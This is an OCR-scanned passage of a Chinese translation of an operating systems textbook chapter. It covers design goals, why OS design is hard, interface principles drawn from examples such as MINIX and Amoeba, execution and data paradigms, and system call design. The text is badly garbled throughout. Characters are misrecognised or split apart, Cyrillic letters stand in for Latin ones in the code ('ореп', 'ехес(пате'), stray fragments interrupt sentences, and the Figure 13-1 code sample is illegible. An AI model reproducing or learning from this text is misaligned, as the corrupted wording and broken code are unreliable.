Steen 等 人 ，1999a) 。 由 于 操作 系统 设计 人 员 在 设计 操作 系统 的 最 优 方法 上 没有 达成 共识 ， 因 此 与 前 面 
各 章 相 比 ， 本 章 更 加 主观 ， 也 无 疑 更 具有 争议 。 


13.1 设计 问题 的 本 质 
操作 系统 设计 与 其 说 是 精确 的 科学 ， 不 如 说 是 一 个 工程 项 目 。 设 置 清晰 的 目标 并 且 满 足 这 些 目标 非 
党 困难。 我 们 将 从 这 些 观点 开始 讨论 。 


13.1.1 目标 

为 了 设计 一 个 成 功 的 操作 系统 ， 设 计 人 员 对 于 需要 什么 必须 有 清晰 的 思路 。 缺 乏 目标 将 使 随后 的 决 
策 非 常 难于 做 出 。 为 了 明确 这 一 点 ， 看 一 看 两 种 程序 设计 语言 PL/I 和 C 会 有 所 启发 。PL/I 是 IBM 公 司 在 20 
世纪 60 年 代 设计 的 , 因为 在 当时 必须 支持 FORTRAN 和 COBOL 是 一 件 令 人 讨厌 的 事 , ГРА ЛЕЛЬ 
学 术 界 背地 里 喷 喷 着 Algol 比 这 两 种 语言 都 要 好 。 所 以 IBM 设 立 了 一 个 委员 会 来 创作 一 种 语言 ， 该 语言 力 
图 满足 所 有 人 的 需要 ， 这 种 语言 就 是 PL/1。 它 具有 一 些 FORTRAN 的 特点 、 一 些 COBOL 的 特点 和 一 些 
Algol 的 特点 。 但 是 该 语言 失败 了 ， 因 为 它 缺乏 统一 的 洞察 力 。 它 只 是 彼此 互相 竞争 的 功能 特性 的 大 杂 
烩 ,并且 过 于 笨重 而 不 能 有 效 地 编译 。 

现在 考察 C 语 言 。 它 是 一 个 人 (Dennis Ritchie) 为 了 一 个 目的 (系统 程序 设计 ) 而 设计 的 。C 语 言 
在 所 有 的 方面 都 取得 了 巨大 的 成 功 ， 因 为 Ritchie 知 道 他 需要 什么 ， 不 需要 什么 。 结 果 ， 在 面世 几 十 年 之 
后 ，C 语 言 仍然 在 广泛 使 用 。 对 于 需要 什么 要 有 一 个 清晰 的 洞察 力 是 至 关 重 要 的 。 

操作 系统 设计 人 员 需 要 什么 ? 很 明显 ， 不 同 的 系统 会 有 所 不 同 ， 嵌 入 式 系统 就 不 同 于 服务 器 系统 。 
然而 ， 对 于 通用 的 操作 系统 而 言 ， 需 要 留心 4 个 基本 的 要 素 : 

1) 定义 抽象 概念 。 

2) 提供 基本 操作 。 

3) 确保 隔离 。 

4) 管理 硬件 。 
下 面 将 描述 这 些 要 素 。 

一 个 操作 系统 最 重要 但 可 能 最 困难 的 任务 是 定义 正确 的 抽象 概念 。 有 -- 些 抽象 概念 ， 例 如 进程 和 文 
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件 ， 多 年 以 前 就 已 经 提出 来 了 ， 似 乎 比较 显而易见 。 其 他 一 些 抽象 概念 ， 例 如 线程 ， 还 比较 新 鲜 ， 就 不 
那么 成 熟 了 。 例 如 ， 如 果 一 个 多 线程 的 进程 有 一 个 线程 由 于 等 待 键盘 输入 而 阻塞 ， 那 么 由 这 个 进程 通过 
调用 fork 函 数 创建 的 新 进程 是 否 也 包含 一 个 等 待 键盘 输入 的 线程 ”其 他 的 抽象 概念 涉及 同步 、 信 号 、 

存 模型 、1/O 的 建 模 以 及 其 他 领域 。 

每 一 个 抽象 概念 可 以 采用 具体 数据 结构 的 形式 实例 化 。 用 户 可 以 创建 进程 、 文 件 、 信 号 量 等 。 基 本 
操作 则 处 理 这 些 数据 结构 。 例 如 ， 用 户 可 以 读 写 文件 。 基 本 操作 以 系统 调用 的 形式 实现 。 从 用 户 的 观点 来 
看 ， 操 作 系统 的 核心 是 由 抽象 概念 和 其 上 的 基本 操作 所 构成 的 ， 而 基本 操作 则 可 通过 系统 调用 加 以 利用 。 

由 于 多 个 用 户 可 以 同时 登录 到 一 台 计 算 机 ， 操 作 系统 需要 提供 机 制 将 他 们 隔离 。 一 个 用 户 不 可 以 干 
扰 另 一 个 用 户 。 为 了 保护 的 目的 ， 进 程 概念 广泛 地 用 于 将 资源 集合 在 一 起 。 文 件 和 其 他 数据 结构 一 般 也 
是 受 保护 的 。 确 保 每 个 用 户 只 能 在 授权 的 数据 上 执行 授权 的 操作 是 系统 设计 的 关键 目标 。 然 而 ， 用 户 还 
希望 共享 数据 和 资源 ， 因 此 隔离 必须 是 选择 性 的 并 且 要 在 用 户 的 控制 之 下 。 这 就 使 问题 更 加 复杂 化 了 。 
电子 邮件 程序 不 应 该 弄 坏 Web 浏 览 器 程序 ， 即 使 只 有 一 个 用 户 ， 不 同 的 进程 也 应 该 隔离 开 来 。 

与 这 一 要 点 密切 相关 的 是 需要 隔离 故障 。 如 果 系 统 的 某 一 部 分 崩溃 (最 为 一 般 的 是 一 个 用 户 进程 崩 
溃 ) ， 不 应 该 使 系统 的 其 余部 分 随 之 崩溃 。 系 统 设计 应 该 确保 系统 的 不 同 部 分 良好 地 相互 隔离 。 从 理想 
的 角度 看 ， 操 作 系 统 的 各 部 分 也 应 该 相互 隔离 ， 以 便 使 故障 独立 。 

最 后 ， 操 作 系统 必须 管理 硬件 。 特 别 地 ， 它 必须 处 理 所 有 低级 芯片 ， 例 如 中 断 控制 器 和 总 线 控制 器 。 
它 还 必须 提供 一 个 框架 ， 从 而 使 设备 驱动 程序 得 以 管理 更 大 规模 的 VO 设备 ， 例 如 磁盘 、 打 印 机 和 显示 器 。 


13.1.2 设计 操作 系统 为 什么 困难 

摩尔 定律 表明 计算 机 硬件 每 十 年 改进 100 倍 ， 但 却 没 有 一 个 定律 宜 称 操作 系统 每 十 年 改进 100 倍 。 甚 
至 没有 人 能 够 宜 称 操作 系统 每 十 年 在 某 种 程度 上 会 有 所 改善 。 事 实 上 ， 可 以 举 出 事例 ， 一 些 操作 系统 在 
很 多 重要 的 方面 (例如 可 靠 性 ) 比 20 世 纪 70 年 代 的 UNIX 版 本 7 还 要 精 糕 。 

为 什么 会 这 样 ?大 部 分 责任 常常 归 谷 于 惯性 和 渴望 向 后 兼容 ， 不 能 坚持 良好 的 设计 原则 也 是 问题 的 
根源 。 但 是 还 不 止 这 些 。 操 作 系统 在 特定 的 方面 根本 不 同 于 计算 机 商店 以 49 美 元 销售 的 小 型 应 用 程序 。 
我 们 下 面 就 看 一 看 使 设计 一 个 操作 系统 比 设计 一 个 应 用 程序 要 更 加 困难 的 8 个 问题 。 

第 一 ， 操 作 系统 已 经 成 为 极其 庞大 的 程序 。 没 有 一 个 人 能 够 坐 在 一 台 PC 机 前 在 几 个 月 内 匆匆 地 完成 
一 个 严肃 的 操作 系统 。UNIX 的 所 有 当前 版 本 都 超过 了 300 万 行 代码 ，Windows Vista 有 超过 500 万 行 的 内 
核 代码 (全 部 代码 超过 7 亿 行 )。 没 有 一 个 人 能 够 理解 300 万 到 500 万 行 代码 ， 更 不 必 说 7 亿 行 代码 。 当 你 拥 
有 一 件 产品 ， 如 果 没 有 一 名 设计 师 能 够 有 望 完全 理解 它 时 ， 结 果 经 常 远 没有 达到 最 优 也 就 不 难 预料 了 。 

操作 系统 不 是 世界 上 最 复杂 的 系统 ， 例 如 ， 航 空 母 舰 就 要 复杂 得 多 ， 但 是 航空 母 舰 能 够 更 好 地 分 成 
相互 隔离 的 部 分 。 设 计 航空 母 舰 上 的 卫生 间 的 人 员 根本 不 必 关 心 雷达 系统 ， 这 两 个 子 系统 没有 什么 相互 
作用 。 而 在 操作 系统 中 ， 文 件 系统 经 常 以 意外 的 和 无 法 预料 的 方式 与 内 存 系统 相互 作用 。 

第 二 ， 操 作 系统 必须 处 理 并 发 。 系 统 中 往往 存在 多 个 用 户 和 多 个 设备 同时 处 于 活动 状态 。 管 理 并 发 
自然 要 比 管理 单一 的 顺序 活动 复杂 得 多 。 竞 争 条 件 和 死 锁 只 是 出 现 的 问题 中 的 两 个 。 

第 三 ， 操 作 系统 必须 处 理 可 能 有 敌意 的 用 户 一 一 想 要 干扰 系统 的 用 户 或 者 做 不 允许 做 的 事情 (例如 
偷窃 另 一 个 用 户 的 文件 ) 的 用 户 。 操 作 系 统 需要 采取 措施 阻止 这 些 用 户 不 正当 的 行为 ， 而 字 处 理 程序 和 
照片 编辑 程序 就 不 存在 这 样 的 问题 。 

第 四 ， 尽 管事 实 上 并 非 所 有 的 用 户 都 相信 其 他 用 户 ， 但 是 许多 用 户 确实 希望 与 经 过 选择 的 其 他 用 户 
共享 他 们 的 信息 和 资源 。 操 作 系统 必须 使 其 成 为 可 能 ， 但 是 要 以 确保 怀 有 恶意 的 用 户 不 能 妨害 的 方式 。 
而 应 用 程序 就 不 会 面 对 类 似 这 样 的 挑战 。 

第 五 ， 操 作 系统 已 经 问世 很 长 时 间 了 。UNIX 已 经 历 了 四 分 之 一 个 世纪 ，Windows 面 世 也 已 经 超过 二 
十 年 并 且 还 没有 消退 的 迹象 。 因此， 设计 人 员 必 须 思考 硬件 和 应 用 程序 在 贤 远 的 未 来 可 能 会 发 生 的 变化 ， 
并 且 考 虑 为 这 样 的 变化 做 怎样 的 准备 。 紧 密 地 局 限于 世界 的 一 个 特定 视野 的 系统 通常 不 会 存世 太 久 。 

第 六 ， 操 作 系统 设计 人 员 对 于 他 们 的 系统 将 怎样 被 人 使 用 实际 上 并 没有 确切 的 概念 ， 所 以 他 们 需要 
提供 相当 程度 的 通用 性 。UNIX 和 Windows 在 设计 时 都 没有 把 电子 邮件 或 Web 浏 览 器 放 在 心 上 ， 然 而 许多 
运行 这 些 系统 的 计算 机 却 很 少 做 其 他 的 事情 。 人 们 在 告诉 一 名 轮船 设计 师 建造 一 条 轮船 时 ， 却 会 指明 他 
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想 要 的 是 渔船 、 游 船 还 是 战舰 ， 并 且 当 产品 生产 出 来 之 后 鲜 有 人 会 改变 产品 的 用 途 。 

第 七 ， 现 代 操 作 系统 一 般 被 设计 成 可 移植 的 ， 这 意味 着 它们 必须 运行 在 多 个 硬件 平台 上 。 它 们 还 必 
须 支持 上 千 个 1O 设 备 ， 所 有 这 些 1/O 设 备 都 是 独立 设计 的 ， 彼 此 之 间 没 有 关系 。 这 样 的 差异 可 能 会 导致 
问题 ， 一 个 例子 是 操作 系统 需要 运行 在 小 端 机 器 和 大 端 机 器 上 。 第 二 个 例子 经 常 在 MS-DOS 下 看 到 ， 用 
户 试图 安装 一 块 声卡 和 一 个 调制 解 调 器 ， 而 它们 使 用 了 相同 的 MO 端口 或 者 中 断 请 求 线 。 除 了 操作 系统 
以 外 ， 很 少 有 程序 必须 处 理由 于 硬件 部 件 冲突 而 导致 的 这 类 问题 。 

第 八 ， 也 是 最 后 一 个 问题 ， 是 经 常 需要 与 某 个 从 前 的 操作 系统 保持 向 后 兼容 。 以 前 的 那个 系统 可 能 在 
字 长 、 文 件 名 或 者 其 他 方面 有 所 限制 ， 而 在 设计 人 员 现在 看 来 这 些 限制 都 是 过 时 的 ， 但 是 却 必须 坚持 。 这 
就 像 让 一 家 工厂 转 而 去 生产 下 一 年 的 汽车 而 不 是 这 一 年 的 汽车 的 同时 ， 继 续 全 力 地 去 生产 这 一 年 的 汽车 。 


13.2 接口 设计 

到 现在 读者 应 该 清楚 ， 编 写 一 个 现代 操作 系统 并 不 容易 。 但 是 人 们 要 从 何 处 开始 呢 ? 可 能 最 好 的 起 
点 是 考虑 操作 系统 提供 的 接口 。 操 作 系统 提供 了 一 组 抽象 ， 主 要 是 数据 类 型 (例如 文 件 ) 以 及 其 上 的 操 
作 (例如 read)。 它 们 合 起 来 形成 了 对 用 户 的 接口 。 注 意 ， 在 这 一 上 下 文中 操作 系统 的 用 户 是 指 编写 使 
用 系统 调用 的 代码 的 程序 员 ， 而 不 是 运行 应 用 程序 的 人 员 。 

除了 主要 的 系统 调用 接口 ， 大 多 数 操作 系统 还 具有 另外 的 接口 。 例 如 ， 某 些 程序 员 需 要 编写 插入 到 
操作 系统 中 的 设备 驱动 程序 。 这 些 驱动 程序 可 以 看 到 操作 系统 的 某 些 功能 特性 并 且 能 够 发 出 某 些 过 程 调 
用 。 这 些 功能 特性 和 调用 也 定义 了 接口 ， 但 是 与 应 用 程序 员 看 到 的 接口 完全 不 同 。 如 果 一 个 系统 要 取得 
成 功 ， 所 有 这 些 接口 都 必须 仔细 地 设计 。 


13.2.1 指导 原则 

有 没有 指导 接口 设计 的 原则 ? 我 们 认为 是 有 的 。 简 而 言 之 ， 原 则 就 是 简单 、 完 备 和 能 够 有 效 地 实现 。 

原则 1: 简单 

一 个 简单 的 接口 更 加 易于 理解 并 且 更 加 易于 以 无 差错 的 方式 实现 。 所 有 的 系统 设计 人 员 都 应 i 
法 国 先驱 飞行 家 和 作家 Antoine de St. Exupéry 的 著名 格言 : 

不 是 当 没有 东西 可 以 再 添加 ,而 是 当 没 有 东西 可 以 再 裁减 时 ， 才 能 达到 尽善尽美 。 

这 一 原则 说 的 是 少 比 多 好 ， 至 少 在 操作 系统 本 身 中 是 这 样 。 这 一 原则 的 另 一 种 说 法 是 KISS 原 则 : 
Keep It Simple, Stupid (保持 简朴 无 华 )。 

原则 2: 完备 

当然 ， 接 口 必须 能 够 做 用 户 需要 做 的 一 切 事情 ， 也 就 是 说 ， 它 必须 是 完备 的 。 这 使 我 们 想起 了 另 一 
条 著名 的 格言 ，Albert Einstein (阿尔 伯 特 - 爱 因 斯 坦 ) 说 过 : 

万 事 都 应 该 尽 可 能 简单 ， 但 是 不 能 过 于 简单 。 
换言之 ， 操 作 系统 应 该 不 多 不 少 准 确 地 做 它 需 要 做 的 事情 。 如 果 用 户 需要 存储 数据 ， 它 就 必须 提供 存储 数 
据 的 机 制 ， 如 果 用 户 需要 与 其 他 用 户 通信 ， 操 作 系统 就 必须 提供 通信 机 制 ， 如 此 等 等 。1991 年 ，CTSS 和 
MULTICS 的 设计 者 之 一 Femando Corbat6 在 他 的 图 灵 奖 演说 中 ， 将 简单 和 完备 的 概念 结合 起 来 并 且 指出 : 

首先 ， 重 要 的 是 强调 简单 和 精练 的 价值 ， 因 为 复杂 容易 导致 增加 困难 并 且 产生 错误 ， 正 如 我 们 已 经 
看 到 的 那样 。 我 对 精练 的 定义 是 以 机 制 的 最 少 化 和 清晰 度 的 最 大 化 实现 指定 的 功能 。 
此 处 重要 的 思想 是 机 制 的 最 少 化 (minimum of mechanism)。 换 言 之 ， 每 一 个 特性 、 功 能 和 系统 调用 都 
应 该 尽 自己 的 本 分 。 它 应 该 做 一 件 事情 并 且 把 它 做 好 。 当 设计 小 组 的 一 名 成 员 提议 扩充 一 个 系统 调用 或 
者 添加 某 些 新 的 特性 时 ， 其 他 成 员 应 该 问 这 样 的 问题 :“ 如 果 我 们 省 去 它 会 不 会 发 生 可 怕 的 事情 ? ”如 
果 回 答 是 :“ 不 会 ， 但 是 有 人 可 能 会 在 某 一 天 发 现 这 一 特性 十 分 有 用 "， 那么 请 将 其 放 在 用 户 级 的 库 中 ， 
而 不 是 操作 系统 中 ， 尽 管 这 样 做 可 能 会 使 速度 慢 一 些 。 并 不 是 所 有 的 特性 都 要 比 高 速 飞行 的 子弹 还 要 快 。 
目标 是 保持 Corbat6 所 说 的 机 制 的 最 少 化 。 

让 读者 简略 地 看 一 看 我 亲身 经 历 的 两 个 例子 ， MINIX (Tanenbaum 和 Woodhull，2006) 和 Amoeba 
(Tanenbaum 等 人 ，1990)。 实 际 上 ，MINIX 具 有 三 个 系统 调用 ;send、receive 和 sendrec。 系统 是 作为 
一 组 进程 的 集合 而 构造 的 ， 内 存 管理 、 文 件 系统 以 及 每 个 设备 驱动 程序 都 是 单独 的 可 调度 的 进程 。 作为 
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首要 的 近似 ， 内 核 所 做 的 全 部 工作 只 是 调度 进程 以 及 处 理 在 进程 之 间 传递 的 消息 。 因 此 ， 只 需要 两 个 系 
统 调 用 : send 发 送 一 条 消息 ， 而 receive 接 收 一 条 消息 。 第 三 个 调用 sendrec 只 是 为 了 效率 的 原因 而 做 的 
优化 ， 它 使 得 仅 用 一 次 内 核 陷阱 就 可 以 发 送 一 条 消息 并 且 请 求 应 答 。 其 他 的 一 切 事情 都 是 通过 请 求 某 些 
其 他 进程 (例如 文件 系统 进程 或 磁盘 驱动 程序 ) 做 相应 的 工作 而 完成 的 。 

Amoeba 甚 至 更 加 简单 。 它 仅 有 一 个 系统 调用 :执行 远程 过 程 调用 。 该 调用 发 送 一 条 消息 并 且 等 待 
-个 应 答 。 它 在 本 质 上 与 MINIX 的 sendrec 相 同 。 其 他 的 一 切 都 建立 在 这 一 调用 的 基础 上 。 

原则 3: 效率 

第 三 个 指导 方针 是 实现 的 效率 。 如 果 一 个 功能 特性 或 者 系统 调用 不 能 够 有 效 地 实现 ， 或 许 就 不 值得 
包含 它 。 对 于 程序 员 来 说 ， 一 个 系统 调用 的 代价 有 多 大 也 应 该 在 直觉 上 是 显而易见 的 。 例 如 ，UNIX 程 
序 员 会 认为 lseek 系 统 调用 比 read 系 统 调用 要 代价 低廉 ， 因 为 前 者 只 是 在 内 存 中 修改 一 个 指针 ， 而 后 者 
则 要 执行 磁盘 IO。 如 果 直 觉 的 代价 是 错误 的 ， 程 序 员 就 会 写 出 效率 差 的 程序 。 


13.2.2 范 型 

一 旦 确定 了 目标 ， 就 可 以 开始 设计 了 。 一 个 良好 的 起 点 是 考虑 客户 将 怎样 审视 该 系统 。 最 为 重要 的 
问题 之 一 是 如 何 将 系统 的 所 有 功能 特性 良好 地 结合 在 一 起 ， 并 且 展现 出 经 常 所 说 的 体系 结构 一 致 性 
(architectural coherence) 。 在 这 方面 ， 重 要 的 是 区 分 两 种 类 型 的 操作 系统 “客户 "。 一 方面 ， 是 用 户 ， 他 
们 与 应 用 程序 打交道 ， 另 一 方面 ， 是 程序 员 ， 他 们 编写 应 用 程序 。 前 者 主要 涉及 GUI， 后 者 主要 涉及 系 
统 调用 接口 。 如 果 打 算 拥 有 遍及 整个 系统 的 单一 GUL， 就 像 在 Macintosh 中 那样 ， 设 计 应 该 在 此 处 开始 。 
然而 ， 如 果 打 算 支持 许多 可 能 的 GUI， 就 像 在 UNIX 中 那样 ， 那 么 就 应 该 首先 设计 系统 调用 接口 。 首 先 
设计 GUI 本 质 上 是 自 顶 向 下 的 设计 。 这 时 的 问题 是 GUI 要 拥有 什么 功能 特性 ， 用 户 将 怎样 与 它 打交道 ， 
以 及 为 了 支持 它 应 该 怎样 设计 系统 。 例 如 ， 如 果 大 多 数 程序 在 屏幕 上 显示 图 标 然后 等 待 用 户 在 其 上 点 击 ， 
这 暗示 着 GUI 应 该 采用 事件 驱动 模型 ， 并 且 操作 系统 或 许 也 应 该 采用 事件 驱动 模型 。 另 一 方面 ， 如 果 屏 
幕 主要 被 文本 窗口 占据 ， 那 么 进程 从 键盘 读 取 输入 的 模型 可 能 会 更 好 。 

首先 设计 系统 调用 接口 是 自 底 向 上 的 设计 。 此 时 的 问题 是 程序 员 通常 需要 哪些 种 类 的 功能 特性 。 实 
际 上 ， 并 不 是 需要 许多 特别 的 功能 特性 才能 支持 一 个 GUL。 例 如 ，UNIX 人 窗口 系统 X 只 是 一 个 读 写 键盘 、 
鼠标 和 屏幕 的 大 的 C 程 序 。X 是 在 UNIX 问 世 很 久 以 后 才 开 发 的 ， 但 是 并 不 要 求 对 操作 系统 做 很 多 修改 就 
可 以 使 它 工作 。 这 一 经 历 验证 了 这 样 的 事实 :UNIX 是 十 分 完备 的 。 

1. 用 户 界 面 范 型 

对 于 GUI 级 的 接口 和 系统 调用 接口 而 言 ， 最 重要 的 方面 是 有 一 个 良好 的 范 型 (有 时 称 为 隐喻 )， 以 
提供 观察 接口 的 方法 。 台 式 计算 机 的 许多 GUI 使 用 我 们 在 第 5 章 讨论 过 的 WIMP 范 型 。 该 范 型 在 遍及 接口 
的 各 处 使 用 定点 -点 击 、 定 点 -双击 、 拖 动 以 及 其 他 术语 ， 以 提供 总 体 上 的 体系 结构 一 致 性 。 对 于 应 用 
程序 常常 还 有 额外 的 要 求 ， 例 如 要 有 一 个 具有 文件 (FILE) 、 编 辑 (EDIT) 以 及 其 他 条 目的 菜单 栏 ， 每 
个 条 目 具有 某 些 众所周知 的 菜单 项 。 这 样 ， 熟 悉 一 个 程序 的 用 户 就 能 够 很 快 地 学 会 另 一 个 程序 。 

然而 ，WIMP 用 户 界面 并 不 是 惟一 可 能 的 用 户 界面 。 某 些 掌 上 型 计算 机 使 用 一 种 程式 化 的 手写 界面 。 
专用 的 多 媒体 设备 可 能 使 用 像 VCR 一 样 的 界面 。 当 然 ， 语 音 输入 具有 完全 不 同 的 范 型 。 重 要 的 不 是 选择 
这 么 多 的 范 型 ， 而 是 存在 一 个 单一 的 统领 一 切 的 范 型 统一 整个 用 户 界面 。 

不 管 选择 什么 范 型 ， 重 要 的 是 所 有 应 用 程序 都 要 使 用 它 。 因 此 ， 系 统 设计 者 需要 提供 库 和 工具 包 给 
应 用 程序 开发 人 员 ， 使 他 们 能 够 访问 产生 一 致 的 外 观 与 感觉 的 过 程 。 用 户 界面 设计 非常 重要 ， 但 它 并 不 
是 本 书 的 主题 ， 所 以 我 们 现在 要 退回 到 操作 系统 接口 的 主题 上 。 

2. 执行 范 型 

体系 结构 一 至 性 不 但 在 用 户 层面 是 重要 的 ， 在 系统 调用 接口 层面 也 同样 重要 。 在 这 里 区 分 执行 范 型 
和 数据 范 型 常常 是 有 益 的 ， 所 以 我 们 将 讨论 两 者 ， 我 们 以 前 者 为 开始 。 

两 种 执行 范 型 被 广泛 接受 算法 范 型 和 事件 驱动 范 型 。 算 法 范 型 (algorithmic paradigm) 基于 这 样 
的 思想 ， 启 动 一 个 程序 是 为 了 执行 某 个 功能 ， 而 该 功能 是 事先 知道 的 或 者 是 从 其 参数 获知 的 。 该 功能 可 
能 是 编译 一 个 程序 、 编 制 工资 册 ， 或 者 是 将 一 架 飞机 飞 到 旧金山 。 基 本 逻辑 被 硬 接线 到 代码 当中 ， 而 程 
序 则 时 常 发 出 系统 调用 获取 用 户 输入 、 获 得 操作 系统 服务 等 。 图 13-1a 中 概括 了 这 一 方法 。 
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тап() main() 
ү intan; l mess_t msg; 
; init(); 
„= “шшк” 
do_something -else(); сазо 


а) b) 
图 13-1 а) 算法 代码 ，b) 事件 驱动 代码 


另 一 种 执行 范 型 是 图 13-Ib 所 示 的 享 件 驱 动 范 型 (event-driven paradigm)。 在 这 里 程序 执行 革 种 初 
始 化 (例如 通过 显示 某 个 屏幕 ) ， 然 后 等 待 操作 系统 告诉 它 第 一 个 事件 。 事 件 经 常 是 键盘 直击 或 鼠标 移 
动 。 这 一 设计 对 于 高 度 交互 式 的 程序 是 十 分 有 益 的 。 

这 些 做 事情 的 每 一 种 方法 造就 了 其 特有 的 程序 设计 风格 。 在 算法 范 型 中 ， 算 法 位 居中 心 而 操作 系统 
被 看 作 是 服务 提供 者 。 在 事件 虹 动 范 型 中 ， 操 作 系统 同样 提供 服务 ， 但 是 这 一 角色 与 作为 用 户 行为 的 协 
调 者 和 被 进程 处 理 的 事件 的 生产 者 相 比 就 没 那么 重要 了 。 

з. 数据 范 型 

执行 范 型 并 不 是 操作 系统 导出 的 惟一 范 型 ， 同 等 重要 的 范 型 是 数据 范 型 。 这 里 关键 的 问题 是 系统 结 
构 和 设备 如 何 展现 给 程序 员 。 在 早期 的 FORTRAN 批 处 理 系统 中 ， 所 有 一 切 都 是 作为 连续 的 磁带 而 建立 
模型 。 用 于 读 入 的 卡片 组 被 看 作 输入 磁带 ， 用 于 穿孔 的 卡片 组 被 看 作答 出 磁带 ， 并 且 打印 机 输出 被 看 作 
给 出 磁带 。 磁 稚 文 件 也 被 看 作 磁带 。 对 一 个 文件 的 随机 访问 是 可 能 的 ， 只 要 将 磁带 倒 带 到 对 应 的 文件 并 
且 再 次 读 取 就 可 以 了 。 

使 用 作业 控制 卡片 可 以 这 样 来 实现 映射 

MOUNT(TAPE08, REEL781) 

RUN(INPUT, MYDATA, OUTPUT, PUNCH, TAPE08) 

第 一 张 卡片 指示 操作 员 去 从 磁带 架 上 取得 磁带 卷 781， 并 且 将 其 安装 在 磁带 驱动 器 8 上 。 第 二 张 卡 片 指示 
操作 系统 运行 刚刚 编译 的 FORTRAN 程 序 ， 映 射 INPUT ( 意 指 卡片 阅读 机 ) 到 训 辑 磁带 1， 喘 射 磁盘 文件 
MYDATA 到 公 辑 磁带 2， 映射 打印 机 ( 称 为 0UTPUT) 到 逻辑 磁带 3， 喘 射 卡 片 穿孔 机 ( 称 为 PUNCH) 
到 远 辑 磁带 4， 并 且 喘 射 物理 磁带 驱动 器 8 到 加 辑 磁 带 5。 

FORTRAN 具 有 读 写 到 辑 磁带 的 语法 。 通 过 读 逻 辑 克 带 1、 程 序 获得 卡片 输入 。 通 过 写 逻 辑 感 带 3， 
输出 随后 将 会 出 现在 打印 机 上 。 通 过 读 远 辑 磁带 5， 碰 带 卷 781 将 被 污 入 ， 如 此 等 等 。 注 意 ， 磁 带 概念 只 
是 集成 卡片 阅读 机 、 打 印 机 、 穿 孔 机 、 磁 盘 文件 以 及 磁带 的 一 个 范 型 。 在 这 个 例子 中 ， 只 有 运 辑 磁 带 5 
是 一 个 物理 磁带 ， 其 人 的 都 是 普通 的 ( 假 脱 机 ) 磁盘 文件 。 这 只 是 一 个 原始 的 范 型 ， 但 它 却 是 正确 方向 
上 的 一 个 开端 

后 来 ，UNIX 问 世 了 ， 它 采用 ”所 有 一 切 都 是 文件 ”的 模型 进一步 发 展 了 这 一 思想 。 使 用 这 一 范 型 ， 
所 有 IO 设备 都 被 看 作 是 文件 ， 并 且 可 以 像 普通 文件 一 样 打开 和 操作 。C 语 名 

191 = ореп("Пе1", O_RDWR); 

fd2 = open("/dev/tty", O_RDWR); 
打开 一 个 真正 的 磁盘 文件 和 用 户 终端 。 随 后 的 语句 可 以 使 用 fa1 和 fd2 分 别 读 写 它们 。 从 这 一 时 刻 起 ， 在 
访问 文件 和 访问 终端 之 间 并 不 存在 差异 ， 只 不 过 在 终端 上 导 道 是 不 允许 的 。 

UNIX 不 但 统一 了 文件 和 1/O 设 备 ， 它 还 允许 像 访问 文件 一 样 通过 管道 访问 其 他 进程 。 此 外 ， 当 支持 
喘 射 文件 时 ， 一 个 进程 可 以 得 到 其 自身 的 虚拟 内 存 ， 就 像 它 是 一 个 文件 一 样 。 最 后 ， 在 支持 /proc 文 件 系 
统 的 UNIX 版 本 中 ，C 语 句 


542 #13Ж 


83 = ореп("/ргос/501", O_RDWR); 
允许 进程 (尝试) 访问 进程 501 的 内 存 ， 使 用 文件 描述 符 fd3 进 行 读 和 写 ， 这 在 某 种 程度 上 是 有 益 的 ， 例 
如 对 于 一 个 调试 器 。 

Windows Vista 更 进一步 ， 它 试图 使 所 有 一 切 看 起 来 像 是 一 个 对 象 。 一 旦 一 个 进程 获得 了 一 个 指向 
文件 、 进 程 、 信 号 量 、 邮 箱 或 者 其 他 内 核对 象 的 有 效 句 柄 ， 它 就 可 以 在 其 上 执行 操作 。 这 一 范 型 甚至 比 
UNIX 更 加 一 般 化 ， 并 且 比 FORTRAN 要 一 般 化 得 多 。 

统一 的 范 型 还 出 现在 其 他 上 下 文中 ， 其 中 在 这 里 值得 一 提 的 是 Web。Web 背 后 的 范 型 是 充满 了 文档 
的 超 空间 ， 每 一 个 文档 具有 一 个 URL。 通 过 键入 一 个 URL 或 者 点 击 被 URL 所 支持 的 条 目 ， 你 就 可 以 得 到 
该 文档 。 实 际 上 ， 许 多 “文档 ”根本 就 不 是 文档 ， 而 是 当 请 求 到 来 时 由 程序 或 者 命令 行 解释 器 脚本 生成 
的 。 例 如 ， 当 用 户 询问 一 家 网 上 商店 关于 一 位 特定 艺术 家 的 CD 清单 时 ,文档 由 一 个 程序 即时 生成 ， 在 
查询 未 做 出 之 前 该 文档 的 确 并 不 存在 。 

至 此 我 们 已 经 看 到 了 4 种 事例 ， 即 所 有 一 切 都 是 磁带 、 文 件 、 对 象 或 者 文档 。 在 所 有 这 4 种 事例 中 ， 
意图 是 统一 数据 、 设 备 和 其 他 资源 ， 从 而 使 它们 更 加 易于 处 理 。 每 一 个 操作 系统 都 应 该 具有 这 样 的 统一 
数据 范 型 。 


13.23 系统 调用 接口 

如 果 一 个 人 相信 Corbat6 的 机 制 最 少 化 的 格言 ， 那 么 操作 系统 应 该 提供 恰好 够 用 的 系统 调用 ， 并 且 每 
个 系统 调用 都 应 该 尽 可 能 简单 〈 但 不 能 过 于 简单 )。 统 一 的 数据 范 型 在 此 处 可 以 扮演 重要 的 角色 。 例 如 ， 
如 果 文 件 、 进 程 、UO 设 备 以 及 更 多 的 东西 都 可 以 看 作 是 文件 或 者 对 象 ， 那 么 它们 就 都 能 够 用 单一 的 read 
系统 调用 来 读 取 。 否 则 ， 可 能 就 有 必要 具有 read_file、read_proc 以 及 read_tty 等 单独 的 系统 调用 。 

在 某 些 情况 下 ， 系 统 调用 可 能 看 起 来 需要 若干 变 体 ， 但 是 通常 更 好 的 实现 是 具有 处 理 一 般 情况 的 一 
个 系统 调用 ， 而 由 不 同 的 库 过 程 向 程序 员 隐 蕊 这 一 事实 。 例 如 ，UNIX 具 有 一 个 系统 调用 exec， 用 来 禾 
盖 一 个 进程 的 虚拟 地 址 空间 。 最 一 般 的 调用 是 : 

ехес(пате, argp, envp); 

该 调用 加 载 可 执行 文件 name， 并 且 给 它 提供 由 argp 所 指向 的 参数 和 envp 所 指向 的 环境 变量 。 有 时 明 
确 地 列 出 参数 是 十 分 方便 的 ， 所 以 库 中 包含 如 下 调用 的 过 程 : 

execl(name, агд0, arg1, ..., argn, 0); 

execle(name, arg0, arg1, ..., argn, envp); 
所 有 这 些 过程 所 做 的 事情 是 将 参数 粘连 在 一 个 数组 中 ， 然 后 调用 exec 来 做 工作 。 这 一 安排 达到 了 双赢 目 
的 : 单一 的 直接 系统 调用 使 操作 系统 保持 简单 ， 而 程序 员 得 到 了 以 各 种 方法 调用 exec 的 便利 。 

